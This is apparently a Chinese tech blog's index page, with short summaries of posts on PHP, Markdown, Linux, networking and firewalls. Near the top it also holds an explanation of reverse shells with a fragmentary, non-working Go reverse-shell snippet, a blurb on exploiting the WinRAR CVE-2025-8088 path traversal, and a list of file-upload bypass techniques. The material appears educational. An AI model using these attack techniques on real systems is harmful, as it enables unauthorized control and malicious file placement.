-曾牛的博客

反弹shell(reverse shell)，就是控制端监听某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转发到控制端。反弹shell与telnet，ssh等标准shell对应，本质上是网络概念上的客户端与服务端的角色反转。个人对反弹shell的理解是：用户可以通过在shell上键入命令来达到操作主机的目的。正常情况下shell只能由主机的用户使用，但是反弹shell的目的则是将自己的shell反弹给别的主机，让别的主机可以通过shell来控制自己。

原理：根据目标机的特殊环境（如仅有Go、Rust环境，或有自定义限制），编写针对性的反弹Shell脚本。示例：Go语言反弹脚本（reverse_shell.go）import ("net""os/exec""io"// 连接攻击者if err!= nil {return// 执行Shell（Windows替换为"cmd.exe", "/c"）// 重定向标准流// 启动Shellcmd.Run()

WinRAR 作为 Windows 平台最常用的压缩管理工具之一，几乎是每台电脑的 “标配软件”。但在 2025 年 8 月，一款影响范围覆盖的高危漏洞（CVE-2025-8088）被披露 —— 这是一个典型的，攻击者可利用 Windows NTFS 文件系统的 “备用数据流（ADS）” 特性，制作恶意压缩包，绕过 WinRAR 的路径限制，将恶意文件静默解压到系统关键目录（如启动项、系统配置目录），进而实现远程控制、数据窃取，甚至触发系统蓝屏循环。

摘要：作者分享了自己坚持1024天技术博客创作的历程。最初写博客是为了记录学习中的难点和解决方案，如《空心数字金字塔》和《Upload-Labs靶场通关攻略》等文章意外帮助到许多同学。创作带来了数据外的收获：结识技术伙伴、深化知识理解，并成为学习闭环的一部分。文章展示了微信小程序WebSocket通信的核心代码，解决了实时通信和断线重连等难题。未来计划继续完善技术系列，探索更轻量的分享形式，希望这些积累能成为未来的"技术简历"。（149字）

校验位置错误：仅前端校验，后端无校验；校验逻辑缺陷：依赖MIME、文件名等易篡改的字段，未校验文件内容；配置不当：Apache/Nginx解析规则宽松（如.php5解析）、.htaccess.user.ini可上传；逻辑漏洞：条件竞争、路径截断、数组绕过等；第三方漏洞：图片处理库二次渲染不彻底、文件包含漏洞辅助解析。

本文介绍了使用PHP和MySQL构建员工管理系统的完整流程。从数据库设计开始，创建了包含员工基本信息的employees表。通过config.php配置文件建立安全的数据库连接，支持UTF-8编码和异常处理。系统实现了CRUD核心功能：首页展示员工列表并提供操作入口，使用Bootstrap和Font Awesome优化界面，采用预处理语句防止SQL注入，包含数据验证等安全措施。文章详细讲解了从环境配置到功能实现的各个步骤，为开发者提供了一个可直接复用的PHP+MySQL应用开发模板，特别适合需要快速构建数据

本文介绍了PHP操作MySQL数据库的核心知识，重点讲解了数据读取(CRUD中的R操作)。内容涵盖三种连接方式：过程式MySQLi、面向对象MySQLi和PDO，均通过示例代码展示如何安全地连接数据库并执行SELECT查询。文章强调使用显式指定列名替代SELECT *、设置字符集为utf8mb4、异常处理等最佳实践。同时简要提及WHERE子句的作用，为后续数据筛选做铺垫。这些基础操作是构建安全可靠的数据交互层的必备技能。

Markdown高级技巧全解析 本文深入探讨Markdown的进阶应用技巧，包括HTML元素扩展、转义字符使用、数学公式编写和图表绘制四大核心功能。HTML标签可补充原生语法不足，转义字符能精确控制特殊符号显示，数学公式支持复杂表达式渲染，而Mermaid/Flow语法则能直接绘制专业图表（流程图、时序图、甘特图等）。这些高级功能使Markdown突破基础文本限制，成为科研写作、技术文档和项目管理中的强大工具。文章通过大量实例演示各类语法，并给出跨平台兼容性建议，帮助用户根据实际需求选择KaTeX或Math

代码、链接、图片、表格 —— 这四大元素构成了 Markdown 技术写作的 “骨架”。掌握它们的核心语法，不仅能让你的文档从 “能看懂” 升级为 “易读懂”，更能在技术分享、项目协作中传递专业感与严谨性。本文详解的代码高亮技巧让代码片段一目了然，链接与锚点让长文档导航自如，图片处理技巧兼顾美观与性能，表格排版则让数据对比清晰直观。这些看似基础的功能，实则是提升技术写作效率的 “隐形工具”：减少格式调试时间，让精力聚焦于内容本身；通过规范的格式增强可读性，让读者更快捕捉核心信息。

从技术文档到日常笔记，从博客创作到团队协作，Markdown 用极简的语法解决了 “内容与格式平衡” 的核心问题。它不追求复杂的排版特效，却能通过清晰的结构标记，让纯文本也能展现专业的层次与逻辑；它不依赖特定工具，却能在几乎所有平台无缝迁移，真正实现 “一次创作，多端适配”。本文覆盖的标题规范、列表嵌套、引用技巧等内容，既是 Markdown 的基础，也是提升效率的关键。但语法只是工具，真正的价值在于通过它让表达更精准、记录更高效。

本文详细介绍了PHP 8+环境下连接MySQL数据库的两种主要方式：MySQLi（过程式和面向对象）和PDO。MySQLi专为MySQL优化，推荐用于MySQL项目，而PDO支持多种数据库，适合跨数据库场景。文章提供了三种连接方式的代码示例，包括参数设置、错误处理和字符集配置（推荐utf8mb4），并比较了各自的特点和适用场景。同时讲解了如何正确关闭数据库连接，强调生产环境的安全实践，如避免使用空密码和root账户。适合从入门到进阶的开发者学习PHP与MySQL交互的核心技术。

本文系统解析了PHP 8+的核心特性，重点介绍了mail()函数的邮件发送技巧和表单安全处理方案。mail()函数支持纯文本和HTML格式邮件发送，PHP 8+新增了关联数组格式的邮件头参数，提高了代码可读性。文章详细说明了函数参数配置、服务器要求、安全注意事项和常见问题解决方案。在表单处理方面，强调通过初始化变量、POST请求验证、输出转义等措施构建安全表单，并提供了完整的联系表单示例代码。这些内容既适合PHP初学者入门学习，也能帮助有经验的开发者提升代码质量和安全性。

本文深入解析PHP 8+的高级语法特性，重点聚焦日期时间处理、文件操作和状态管理等核心开发场景。文章详细介绍了PHP 8+在日期处理方面的改进，包括时间戳机制、date()函数增强、面向对象的DateTime/DateTimeImmutable类使用，以及DateInterval时间间隔计算等关键技术点。通过大量实战代码示例，展示了如何利用PHP 8+新特性如match表达式、空安全操作符等编写更健壮、更安全的代码。同时强调时区管理、微秒级精度处理等最佳实践，为开发者从PHP 7迁移到8+或夯实高级语法基础

函数内部的静态变量属于局部变量，其作用域局限于函数内部。类中的静态属性属于类变量，其作用域是整个类。除了内置函数，PHP还允许定义自己的函数。这是创建执行特定任务的可重用代码包的一种方法，并且可以与主程序分开保存和维护。函数减少了程序中代码的重复- 函数允许您将常用的代码块提取到单个组件中。现在，您可以通过在脚本中的任何位置调用此函数来执行相同的任务，而不必反复复制和粘贴相同的代码块。函数使代码的维护更加容易。

AAA是Authentication（认证）、Authorization（授权）和Accounting（计费）的简称，它提供了认证、授权、计费三种安全功能。AAA可以通过多种协议
来实现，目前华为设备支持基于RADIUS（RemoteAuthenticationDial-InUser
Service）协议或HWTACACS（ Huawei Terminal Access Controller Access
ControlSystem）协议来实现AAA。不计费：完全不记录资源使用，适用于内部信任网络。

本文系统梳理了RIP和OSPF两种经典内部网关路由协议的技术演进。RIP作为基于距离向量的早期协议，因收敛慢、易产生环路等问题逐渐被淘汰。OSPF则采用链路状态算法，通过LSA泛洪实现全网拓扑同步，结合SPF算法计算最短路径，具有无环路、收敛快、扩展性好等优势。文章详细解析了OSPF的核心机制：包括Hello报文建立邻居关系、DR/BDR选举减少冗余交互、LSA泛洪规则确保拓扑一致性，以及三张关键数据表（邻居表、LSDB、路由表）的作用流程。通过对比RIP与OSPF的技术特性

摘要： DHCP（动态主机配置协议）通过自动分配IP地址等网络参数，简化大型网络管理。其工作流程包含发现（DISCOVER）、提供（OFFER）、选择（REQUEST）、确认（ACK）四个阶段，支持广播/单播通信。地址池分为全局和接口两种类型，提供手工/自动/动态三种分配策略。关键机制包括租期管理（50%/87.5%时段续约）、冲突检测和状态跟踪（空闲/已用/过期/冲突）。该协议显著减少人工配置工作量，有效避免IP地址冲突问题。

语法元素说明示例创建ACL列表，为编号acl 2000（创建基本ACL，编号2000）定义单条规则，<rule-id>为规则编号（需唯一，设备按编号从小到大依次匹配规则）rule 5（创建编号为5的规则）<action>规则动作： -permit：允许匹配的流量 -deny：拒绝匹配的流量deny（拒绝流量）、permit（允许流量）匹配源IP地址： -：源IP（单个IP或网段） -：反掩码（0表示严格匹配该位，255表示任意）（匹配网段）控制逻辑：通过源/目的IP地址和协议类型。

摘要： VLAN（虚拟局域网）技术通过在交换机上逻辑划分多个广播域，实现同VLAN内二层互访与不同VLAN间二层隔离，从而隔离广播域并提升安全性。VLAN帧格式包含标签信息，链路类型分为Access（主机接入）、Trunk（交换机互联）和Hybrid（混合模式）。PVID（端口VLAN ID）为端口提供默认VLAN规则，处理Untagged数据帧时自动添加对应VLAN标签。配置时可通过Hybrid端口灵活控制VLAN流量（Tagged保留标签转发，Untagged剥离标签），结合PVID调整实现网络区域划分

以上平台均为国内安全领域活跃的正规渠道，涵盖漏洞提交、众测项目及技术分享。由于平台链接可能随时间调整，访问时若遇失效，可通过企业官网查询最新地址。安全研究需遵守法律法规，通过合法渠道提交漏洞，共同维护网络安全生态！

本文介绍了华为eNSP中交换机的六种常见连接方式配置方法。重点包括：1）基础直连配置，要求同网段主机IP；2）交换机接口配置，涉及链路类型（access/trunk/hybrid）和VLAN划分；3）主机通过交换机通信的配置流程，包括创建VLAN、配置vlanif网关和接口设置；4）不同交换机互联方案。同时详细讲解了二层/三层交换机区别、VLAN作用、子网划分、网关概念等网络基础知识，并涉及堆叠、层级结构等扩展内容。

定义：共享信道中，多个设备同时发送数据可能引发信号冲突的区域。冲突会导致数据出错、重传，降低网络效率（如早期集线器组网，所有端口共享一个冲突域）。解决：使用交换机隔离冲突域——交换机每个端口对应独立冲突域，设备仅在自身端口“竞争”，大幅减少冲突，提升网络并发能力。“先听后发，边发边听，冲突停发，随机延迟后重发”，本质是共享网络的“竞争信道规则”。计算机网络是一个多层协作的复杂系统，从物理层的信号传输到应用层的服务交互，每一层都有其核心协议与机制。

富规则用于配置复杂策略（如基于IP、端口的精细化控制），支持accept（允许）、reject（拒绝并回应）、drop（静默丢弃）动作。示例1：拒绝特定IP的所有流量# 临时拒绝192.168.0.11的IPv4流量 firewall-cmd --zone = public --add-rich-rule 'rule family="ipv4" source address="192.168.0.11" reject'示例2：允许特定IP访问80端口。

摘要：本文详细介绍了在Windows Server 2012 R2中安装与配置IIS服务的完整流程。内容涵盖IIS 8.0的核心功能与版本适配关系，通过服务器管理器添加角色的分步指南，包括关键组件如ASP和.NET Framework的选择。文章还提供了80端口检查方法、网站创建与路径配置技巧，以及解决主机名访问问题的方案。最后以Web靶场部署为例，演示了SQL Server配置和防火墙端口放行的实际操作。适用于需要快速搭建Web服务的企业用户和技术人员，帮助实现内网服务发布和测试环境搭建。

本文详细介绍了Windows防火墙的基础概念与配置方法，重点讲解了命令行工具netsh advfirewall的实战应用。文章首先区分了防火墙的分类（软件/硬件、主机/网络）和规则方向（入站/出站），然后深入解析了netsh advfirewall firewall命令的核心功能，包括添加、删除、修改和查看规则。通过多个实用示例（如允许远程桌面端口3389、限制特定IP访问HTTP服务等），展示了如何高效配置防火墙规则。文中还提供了规则查询方法和高级参数说明，强调管理员权限要求和规则优先级问题。

本文介绍了Windows系统中常用的DOS命令，分为网络配置和用户管理两大类。网络命令包括ipconfig（IP配置查询）、arp（IP-MAC映射）、ping（网络连通测试）和netstat（连接统计），适用于网络诊断与故障排查。用户管理命令则涵盖net user（用户管理）、net localgroup（组管理）和whoami（当前用户信息），用于账户权限控制。这些命令通过CMD或PowerShell执行，是系统管理员必备的实用工具，能有效提升Windows系统管理效率。

LAMP环境搭建指南 LAMP(Linux+Apache+MySQL+PHP)是构建动态网站的主流开源解决方案。本文详解了LAMP环境的四大组件及其协同关系：Linux作为操作系统层，Apache处理HTTP请求，MySQL管理数据存储，PHP实现动态内容生成。 文章提供了在CentOS 7上的详细搭建步骤，包括： 安装并配置Apache服务 部署MySQL(MariaDB)数据库环境 安装PHP及相关扩展 防火墙规则配置 测试验证方法 通过各组件协同工作，LAMP环境能够高效处理用户请求、业务逻辑和数据

本文详细介绍了Linux软件的四种安装方式：源代码安装、RPM安装、YUM安装和Docker安装。YUM基于RPM，能自动解决依赖，适合日常快速安装；RPM需手动处理依赖，适用于离线或需精确控版场景；源代码安装可定制版本和功能，但操作复杂、依赖需手动处理；Docker通过容器化实现环境隔离，便于快速部署和迁移。文中还对比了四种方式的复杂度、依赖处理、侵入性等，帮助用户根据场景选择，如日常用YUM，微服务用Docker等。

本文详细介绍了Linux系统中的权限管理机制，包括权限基本概念、查看和修改方法。Linux权限分为所有者、所属组和其他用户三类，通过读(r)、写(w)、执行(x)三种权限控制访问。使用ls -l命令可查看权限信息，chmod命令通过字母或数字表示法修改权限（如755、644等）。chown命令用于修改所有者和所属组，umask设置默认权限。文章还提供了实战示例和作业练习，帮助读者掌握权限设置的实际应用（如设置敏感文件仅所有者可访问）。正确配置权限是保障Linux系统安全的关键技能。

Linux用户与组管理命令摘要 本文介绍Linux系统中用户与用户组管理的关键命令及实战应用： 用户管理命令： useradd：创建用户（-m创建家目录，-s指定shell，-u设置UID） userdel：删除用户（-r同时删除家目录，-f强制删除） usermod：修改用户属性（-g改主组，-aG追加附加组，-d修改家目录） passwd：密码管理（-l锁定账户，-u解锁，-e强制修改密码） 用户组管理命令： groupadd：创建新组 groupdel：删除组 groupmod：修改组属性 gpass

本文全面介绍了Linux系统中用户与用户组管理的核心知识。首先阐述了用户(UID)和用户组(GID)的基本概念及其关系特点，随后详细解析了四个关键配置文件：/etc/passwd(用户信息)、/etc/shadow(密码及安全属性)、/etc/group(组信息)和/etc/gshadow(组密码)。每个配置文件的字段格式和含义都通过示例进行了说明。文章还涵盖了用户密码管理命令的使用方法，包括passwd等实用工具，为系统管理员和开发者提供了从理论到实践的完整指导，是掌握Linux权限管理基础的重要参考。

本文介绍的命令涵盖了 Linux 文本处理、系统查询和高级操作的核心工具。more和tail -f适合处理大文件和实时日志，grep是文本搜索的利器，tar用于高效打包压缩，find解决文件定位问题，结合逻辑运算符可实现复杂的命令组合。掌握这些命令不仅能提高日常操作效率，更能为后续学习 Shell 脚本和系统运维打下坚实基础。实践是掌握的关键，建议结合具体场景多练习，逐步熟悉各命令的灵活运用。# Linux 文本处理与系统查询进阶命令详解。

本文介绍了 Linux 系统中常用的文件与目录操作命令，包括查看(ls)、创建(mkdir)、删除(rmdir/rm)、写入(echo)、创建/修改时间(touch)、复制(cp)和移动/重命名(mv)等。每个命令都详细说明了基本用法、常用选项和实用示例，帮助用户高效管理文件和目录。特别强调了rm命令的危险性，提醒谨慎操作。通过掌握这些基础命令，用户可以提升Linux环境下的工作效率。文章适合Linux新手学习参考，也适合有经验的用户巩固基础知识。

本文详细介绍了Linux系统的基础命令操作，从命令结构解析到常用命令实践。主要内容包括：命令的基本结构（命令+选项+参数）、用户角色切换方法（sudo/su）、目录操作命令（cd/pwd/ls）、文件权限系统解析（rwx数字表示法）、目录创建命令（mkdir）以及命令帮助查看（--help）。文章通过具体示例演示了各命令的使用场景和常见选项，特别强调了ls命令中不同文件类型的颜色标识和长格式权限说明。掌握这些基础命令是Linux系统操作的第一步，为后续文件管理、文本处理等高级操作奠定基础。